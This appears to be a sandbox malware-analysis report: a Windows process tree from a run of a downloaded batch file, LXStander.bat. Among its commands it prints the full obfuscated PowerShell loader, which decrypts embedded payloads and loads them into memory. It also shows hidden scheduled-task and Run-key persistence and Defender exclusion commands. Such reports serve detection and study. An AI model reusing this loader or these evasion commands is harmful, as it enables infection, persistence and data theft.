PID 3508 wrote to memory of 2324	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2324	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2324	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2324	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2324	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2324	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2324	3508	chrome.exe	chrome.exe
PID 3508 wrote to memory of 2324	3508	chrome.exe	chrome.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:720

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
1⤵
PID:804

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
2⤵
PID:5416

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca
2⤵
PID:5728

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
2⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:5352

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
2⤵
PID:5396

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k rpcss
1⤵
PID:852

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
1⤵
PID:908

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:336

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
1⤵
PID:588

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
1⤵
PID:752

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
1⤵
PID:1032

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
- Drops file in System32 directory
PID:1052

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
PID:1096

C:\Users\Admin\AppData\Local\Temp\LX.exe
C:\Users\Admin\AppData\Local\Temp\LX.exe
2⤵
- Executes dropped EXE
PID:5580

C:\Users\Admin\AppData\Local\Temp\LX.exe
C:\Users\Admin\AppData\Local\Temp\LX.exe
2⤵
- Executes dropped EXE
PID:5608

C:\Users\Admin\AppData\Local\Temp\LX.exe
C:\Users\Admin\AppData\Local\Temp\LX.exe
2⤵
- Executes dropped EXE
PID:3020

C:\Users\Admin\AppData\Local\Temp\LX.exe
C:\Users\Admin\AppData\Local\Temp\LX.exe
2⤵
- Executes dropped EXE
PID:5432

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1180

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1236

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1252

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1272

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
PID:1332

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1416

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1452

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
1⤵
PID:1480

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
1⤵
PID:1532

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
1⤵
PID:1564

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1644

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1728

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1748

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
1⤵
PID:1804

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
1⤵
PID:1812

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1924

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
1⤵
PID:1708

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2124

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2284

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
1⤵
PID:2308

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2316

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2472

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2532

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
1⤵
PID:2540

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
1⤵
PID:2548

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2568

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:3168

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
1⤵
PID:3296

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:3456

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://gofile.io/d/TLyqC3
2⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3508

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff994079758,0x7ff994079768,0x7ff994079778
3⤵
PID:3524

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1520 --field-trial-handle=1748,i,14573970427788138781,2922258863052217061,131072 /prefetch:2
3⤵
PID:2808

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1844 --field-trial-handle=1748,i,14573970427788138781,2922258863052217061,131072 /prefetch:8
3⤵
PID:920

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2104 --field-trial-handle=1748,i,14573970427788138781,2922258863052217061,131072 /prefetch:8
3⤵
PID:2324

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2968 --field-trial-handle=1748,i,14573970427788138781,2922258863052217061,131072 /prefetch:1
3⤵
PID:4708

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2976 --field-trial-handle=1748,i,14573970427788138781,2922258863052217061,131072 /prefetch:1
3⤵
PID:4664

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4432 --field-trial-handle=1748,i,14573970427788138781,2922258863052217061,131072 /prefetch:1
3⤵
PID:3772

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4836 --field-trial-handle=1748,i,14573970427788138781,2922258863052217061,131072 /prefetch:8
3⤵
PID:4656

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3308 --field-trial-handle=1748,i,14573970427788138781,2922258863052217061,131072 /prefetch:8
3⤵
PID:3000

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4916 --field-trial-handle=1748,i,14573970427788138781,2922258863052217061,131072 /prefetch:1
3⤵
PID:4628

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2676 --field-trial-handle=1748,i,14573970427788138781,2922258863052217061,131072 /prefetch:8
3⤵
PID:1284

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4940 --field-trial-handle=1748,i,14573970427788138781,2922258863052217061,131072 /prefetch:8
3⤵
PID:2144

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\LXStander.bat" "
3⤵
PID:4492

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rSPWyLMpVODQFeipYUBycYBIqWdREMGJxSUE3hY7XNE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4gwvlA4SHKe+6cTXJXevyg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YKEWy=New-Object System.IO.MemoryStream(,$param_var); $iOwTP=New-Object System.IO.MemoryStream; $AiSWp=New-Object System.IO.Compression.GZipStream($YKEWy, [IO.Compression.CompressionMode]::Decompress); $AiSWp.CopyTo($iOwTP); $AiSWp.Dispose(); $YKEWy.Dispose(); $iOwTP.Dispose(); $iOwTP.ToArray();}function execute_function($param_var,$param2_var){ $vGWuZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $SJusj=$vGWuZ.EntryPoint; $SJusj.Invoke($null, $param2_var);}$CkwxY = 'C:\Users\Admin\Downloads\LXStander.bat';$host.UI.RawUI.WindowTitle = $CkwxY;$WaxPe=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($CkwxY).Split([Environment]::NewLine);foreach ($oLcNO in $WaxPe) { if ($oLcNO.StartsWith('UaXZkMaWdgBvBuaytIEr')) { $UDTrE=$oLcNO.Substring(20); break; }}$payloads_var=[string[]]$UDTrE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
4⤵
PID:2504

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
4⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:4736

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_761_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_761.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3108

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_761.vbs"
5⤵
PID:2144

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_761.bat" "
6⤵
PID:2268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rSPWyLMpVODQFeipYUBycYBIqWdREMGJxSUE3hY7XNE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4gwvlA4SHKe+6cTXJXevyg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YKEWy=New-Object System.IO.MemoryStream(,$param_var); $iOwTP=New-Object System.IO.MemoryStream; $AiSWp=New-Object System.IO.Compression.GZipStream($YKEWy, [IO.Compression.CompressionMode]::Decompress); $AiSWp.CopyTo($iOwTP); $AiSWp.Dispose(); $YKEWy.Dispose(); $iOwTP.Dispose(); $iOwTP.ToArray();}function execute_function($param_var,$param2_var){ $vGWuZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $SJusj=$vGWuZ.EntryPoint; $SJusj.Invoke($null, $param2_var);}$CkwxY = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_761.bat';$host.UI.RawUI.WindowTitle = $CkwxY;$WaxPe=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($CkwxY).Split([Environment]::NewLine);foreach ($oLcNO in $WaxPe) { if ($oLcNO.StartsWith('UaXZkMaWdgBvBuaytIEr')) { $UDTrE=$oLcNO.Substring(20); break; }}$payloads_var=[string[]]$UDTrE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
7⤵
PID:3004

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:2236

C:\Users\Admin\AppData\Local\Temp\LXDeveloper.exe
"C:\Users\Admin\AppData\Local\Temp\LXDeveloper.exe"
8⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2136

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\LXDeveloper.exe'
9⤵
- Command and Scripting Interpreter: PowerShell
PID:4820

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'LXDeveloper.exe'
9⤵
- Command and Scripting Interpreter: PowerShell
PID:5532

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\LX.exe'
9⤵
- Command and Scripting Interpreter: PowerShell
PID:5836

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'LX.exe'
9⤵
- Command and Scripting Interpreter: PowerShell
PID:5260

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "LX" /tr "C:\Users\Admin\AppData\Local\Temp\LX.exe"
9⤵
- Creates scheduled task(s)
PID:5156

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}
9⤵
PID:6044

C:\Windows\explorer.exe
"C:\Windows\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text
10⤵
PID:1960

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
9⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:860

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ff994079758,0x7ff994079768,0x7ff994079778
10⤵
PID:1284

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1648 --field-trial-handle=1864,i,11184970263341839347,8791522698813925111,131072 /prefetch:2
10⤵
PID:4248

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1808 --field-trial-handle=1864,i,11184970263341839347,8791522698813925111,131072 /prefetch:8
10⤵
PID:5288

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1996 --field-trial-handle=1864,i,11184970263341839347,8791522698813925111,131072 /prefetch:8
10⤵
PID:1760

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --display-capture-permissions-policy-allowed --first-renderer-process --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2952 --field-trial-handle=1864,i,11184970263341839347,8791522698813925111,131072 /prefetch:1
10⤵
PID:3904

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2976 --field-trial-handle=1864,i,11184970263341839347,8791522698813925111,131072 /prefetch:1
10⤵
PID:1540

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4332 --field-trial-handle=1864,i,11184970263341839347,8791522698813925111,131072 /prefetch:1
10⤵
PID:5616

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4472 --field-trial-handle=1864,i,11184970263341839347,8791522698813925111,131072 /prefetch:8
10⤵
PID:1044

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4624 --field-trial-handle=1864,i,11184970263341839347,8791522698813925111,131072 /prefetch:8
10⤵
PID:3164

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --extension-process --disable-3d-apis --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4500 --field-trial-handle=1864,i,11184970263341839347,8791522698813925111,131072 /prefetch:1
10⤵
PID:5892

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4744 --field-trial-handle=1864,i,11184970263341839347,8791522698813925111,131072 /prefetch:1
10⤵
PID:1776

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4492 --field-trial-handle=1864,i,11184970263341839347,8791522698813925111,131072 /prefetch:8
10⤵
PID:3912

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4336 --field-trial-handle=1864,i,11184970263341839347,8791522698813925111,131072 /prefetch:8
10⤵
PID:1116

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
9⤵
PID:5100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe
9⤵
PID:716

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
9⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:5648

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xd8,0xdc,0xe0,0xb4,0xe4,0x7ff994079758,0x7ff994079768,0x7ff994079778
10⤵
PID:4092

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1544 --field-trial-handle=1756,i,13792765107394607188,8303078753656304169,131072 /prefetch:2
10⤵
PID:2676

